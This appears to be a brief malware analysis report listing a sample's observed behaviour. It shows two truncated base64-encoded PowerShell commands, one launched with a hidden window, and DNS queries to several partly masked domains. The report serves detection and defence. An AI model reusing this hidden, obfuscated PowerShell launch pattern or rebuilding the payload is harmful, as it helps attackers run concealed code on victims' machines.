Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmAGUANAAxAGEAYgBkADUAOQAzAGUAYgA9ACcAYQAwAHgAYgAzADEAZgA3AGYAMQAyAGYAYQAwAGYAMAA5ACcAOwAkAG...
- DNS ASK of###xindia.com
- DNS ASK ah####aircenter.com
- DNS ASK di#####xuongkhop.xyz
- DNS ASK bl###-man.com
- DNS ASK ag###atik.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmAGUANAAxAGEAYgBkADUAOQAzAGUAYgA9ACcAYQAwAHgAYgAzADEAZgA3AGYAMQAyAGYAYQAwAGYAMAA5ACcAOwAkAG...' (with hidden window)